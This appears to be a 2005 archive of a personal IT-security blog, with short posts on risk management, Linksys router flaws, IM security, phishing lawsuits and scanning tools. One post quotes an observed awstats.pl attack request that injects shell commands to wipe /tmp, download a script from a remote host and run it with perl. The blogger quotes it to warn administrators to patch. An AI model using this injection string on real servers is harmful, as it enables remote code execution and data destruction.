General: September 2005 Archives
I just watched a Network World webcast titled IT without Compromise
The webcast addressed some of the things I"ve been thinking about recently. As security complexity increases, as we try to do more on the wire, the cost of piecemeal security solutions goes up. It costs money to protect smtp, http, and IM. And these perimeter solutions dont protect the mobile workforce.
What is needed is an asset oriented solution instead of a threat oriented solution. Rather than buying into protecting against the threat that the trade mags are warning about, you need to look at what needs to be protected. Where are your business assets? Then you can look at what threats there are against those assets and what you have in place to protect those assets. What will happen if those assets are hit. That is a business impact analysis. It is an ongoing thing, because your assets change, threats change, and best practices change.
Security needs to be more holistic. Instead of selling fear, security is the great business enabler. And that is how it needs to be approached. Instead of being centered around threads and technology security needs to be asset and business centered.
I hear on the the DVD for the first season of the U.S. version of the office there is a password scene in the deleted cuts.
edit - I just found the scene on the nbc website.
Dwight - good.. excellent. and file sharing off and done...Security software, 128 bit encryption, firewalls. Get up I'll install it on your computer
Jim - No thanks
Dwight - Stupid. Identity theft happens all the time. I could become you, like that. But no one can become me.
Jim - no one wants to be you Dwight
Dwight - not true. and if they did, they couldn't, becausee I'm password protected
Jim - "Is your password 'Frodo'"?
Dwight - "No..." (he starts typing really fast on his computer)
Another short pause...
Jim - "Did you just change your password to 'Gollum'"?
Dwight - No
(more typing...)
Earthlink won a lawsuit brought by a bank incorrectly identified as a suspicious site by Earthlink's anti-phishing filter.
US District Judge John Shabaz last week ruled that Earthlink was not liable for using dicky data from a third party because of provisions in the 1996 Telecommunications Act. "Because the evidence indicates the information came from another provider, defendant cannot be held liable for the republication of the statements," he wrote.
With Microsoft entering adding an anti-phishing toolbar in IE7, I suspect we'll see similar lawsuits against them.
How many vulnerabilities does a "secure" browser need to have before people realize they were a bit hasty with the bandwagon jumping. I dont care how many secunia graphs you use to defend your niche browser. I'm thinking more than a handful of vulnerabilities could be a sign.
SANS ISC highlighted awstats attacks today in the diary. I'm seeing the same sort of thing. Scans looking for
awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20http://geocities.com/ventor_team/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo|
I think that is a 9 month old awstats vuln. If you're running it you should patch it, and password protect the directory it is installed in.
Certification and Accredidation. Is it the path to security? Does it even purport to be that? I find myself asking that question as I review the site security plan we are putting together where I work. I'm all for best practices. But one best practice is not applicable everywhere. As Jesper Johhanson has written, it is a myth that security check lists will protect you.
I liked what Richard Bejtlich said about this:
Millions of dollars and thousands of hours are spent on C&A, and C&A levels are used to assess security. In reality C&A is a 20-year-old paperwork exercise that does not yield improved security. The only real way to measure security is to track the numbers and types of compromise over time, and try to see that number decrease.
At the Gartner IT Security Summit in London, Ant Allan said that "passwords are no longer adequate, as threats against them increase."
He seems to advocate multi-factor authentication in spite of the expense of smartcards or SecurID.
In my Advanced Network Security course, the first project has to do with implementing a protocol called PAKE. This was proposed last decade. It is a secure method of authentication using password where the password is not sent over the wire. Rather in a DH like fashion the user is able to prove to the server that it knows the password. So an active attacker cannot gain advantage by sniffing the logon. Also the server does not even store the password in a format that is useful if the PDV is stolen. Any two-factor authentication should perform authenticate both the server and the client, and not be susceptible to man in the middle. This makes PAKE an interesting study, although i"m not sure how well it scales.
http://software.silicon.com/security/0,39024655,39152300,00.htm
IT departments should not be calling the shots on security, according to Jay Heiser, research VP at Gartner Research. Instead, companies need to take a business-oriented, risk-management approach. Stepping back from technical details allows a company's IT practices to be forward-looking, aligned with the core business, and provide better return on investment. Zurich Financial Services halved its IT costs by outsourcing the commodity aspects of IT and security and focusing on policy rather than the technical aspects of the firewall. Heiser says that IT training is not enough anymore, but the job of managing IT risk requires a business school background majoring in risk management.
I would agree that risk management is an important part of computer security. You need to decide what is important. What it would cost if damaged. What it would cost to repair, what it would cost to protect. That is a business decision, not a techie decision. However, if you remove the decision from the IT department itself, or remove it from the CIO or CSO then there is a communications gulf that becomes difficult to cross.
It has always been the security techs job to explain what the problem is, how it will effect business, and what it will cost to fix. Was I.T. training alone ever enough?
In the same venue, there is an article in SC Magazine that say the next generation of security experts will need to be business savvy as much as they are technically knowledgeable. "take your best and brightest security people and teach them more about business rather than worrying about getting them CISSPs and CISMs."
Soft skills are essential. But that doesn't mean you can just take a suit and turn him into a Information Security professional. At the same time, unless you want to get relegated to the basement (like I.T pre-2000) you need to have the interpersonal skills, you need to be able to explain security issues, you need to be able to communicate with your manager, your director and your CIO and relate why this is important.
As reported by iDefense, there are several problems in multiple versions of firmware for Linksys's WRT54G
1. Authentication problem in setup page
2. Buffer overflow in apply.cgi allows attacker to take action as administrator
Workaournd
3. The restore.cgi portion of the webpage will take unauthenticated restore commands and restore them at next boot.
4. Unauthenticated upgrade of the firmwware. Attacker could replace the firmware with their own code
5. Input validation may allow denial of service of the device.
The quick workaround for this is to make sure that the linksys administrator site on your router cannot be accessed over your wireless network.
• Connect to the web interface, typically at http://192.168.1.1/
• Go to the Administration page
• Select 'Disable' next to the 'Wireless Access Web'
• Click the 'Save Settings' button.
Of course a malicious attacker on your internal wired network could still get you, but theoretically you have more control over where you live than where your wireless signal may reach.
Recommended action, check the Linksys support site for an upgrade to your router firmware.
http://www.imlogic.com/news/press_119.asp
In a recent survey of 1,100 enterprise IM users, IMlogic found that most respondents unwittingly expose their computers and the company’s infrastructures to malicious attacks because of IM’s social nature: users believe they are protected because they only exchange instant messages with people they trust. Some of the survey’s key findings include:78 percent perceive IM to be safer than e-mail, and not subject any security threats or potential vulnerabilities;
63 percent would click on an unknown link because it came from someone on their buddy list, a perceived trusted source;
45 percent use IM at work because they believe their communication is unmonitored;
35 percent believe they have received a message containing a malicious link; and
29 percent regularly transfer files over IM.
I like stories like this that show planning, preparation and hardwork paying off. A Wall Street Journal article (linked here in the Pittsburg Post-Gazette) writes about the disaster response team that got Wal-Marts reopened across the Gulf Coast after they were hit by Katrina.
Wal-Mart's speed in responding to Katrina underscores the extent to which it and other big-box retailers like Home Depot Inc. have become key players in responding to natural disasters. Whereas FEMA has to scramble for resources, Bentonville, Ark.-based Wal-Mart has it owns trucks, distribution centers and dozens of stores in most areas of the country. It also has a specific protocol for responding to disasters, and it can activate an emergency command center to coordinate an immediate response
Sheriff Bob Buckley of Union Parish, La., has nothing but praise for Wal-Mart's role. About 600 law-enforcement officers from around the state gathered in Gonzalez to start rescue operations, he says, but they had no supplies. They called Wal-Mart the day after the hurricane hit and two days later, they got two truckloads of flashlights, batteries, meals ready to eat, protective gear and ammunition.And when did FEMA arrive? "Who?" Sheriff Buckley asks.
Today's Sharktank just sends a cold chill down my spine.
Mozillazine reports that plans are in the works to remove support for SSL version 2 from Firefox.
Anyone heard if IE7 will do likewise? SSL2 is old, if I remember right it is vulnerable to a Man in the Middle attack.
This is old news, but I was on vacation when zotob, etc came out and I missed this.
Foundstone just released an MS05-039 scanner.
for the direct download or for more info.
Unlike eEye's free scan tool for MS05-039 this one doesn't crash on you, it isn't limited to a small number of IP address (around 18), and it doesn't require a software install.
My favorite thing about the free foundstone individual vulnerability scan tool is you can create an import file with your IP ranges. That would be a huge job for me otherwise since our remote site address space is rather disjunct. Check out the readme, make sure to run this from a server so you get the fully threaded capability and aren't crippled by XPsp2 to 10 connections.
Although this is much after the fact, its still important to catchup with who isn't patched. Sure you probably have other tools, but I'm a fan of using tools like this to doublecheck the others.
Did you know that if you browse with Internet Explorer that a site could grab what's in your clipboard? This not-so-startling announcement was made in in the ISC Diary.
My reaction? Welcome to 2004. No wait, make that 2002. Oh, no make that since IE 5 was released.
The article doesn't mentioning talking to the IE product team. I'm sure they have the contacts to do so if they wanted to.
The article doesn't mention any testing. They could have reported testing that although IE6 on XPsp2 still had the problem, IE7 by default does not. They could have described how to fix the problem in earlier versions of IE with a minor settings change. Perhaps even a way to push that out with Group Policy.
No doubt some people learned something new today because of the ISC post. That will be seen as good justification by most. To me it seemed like old news.
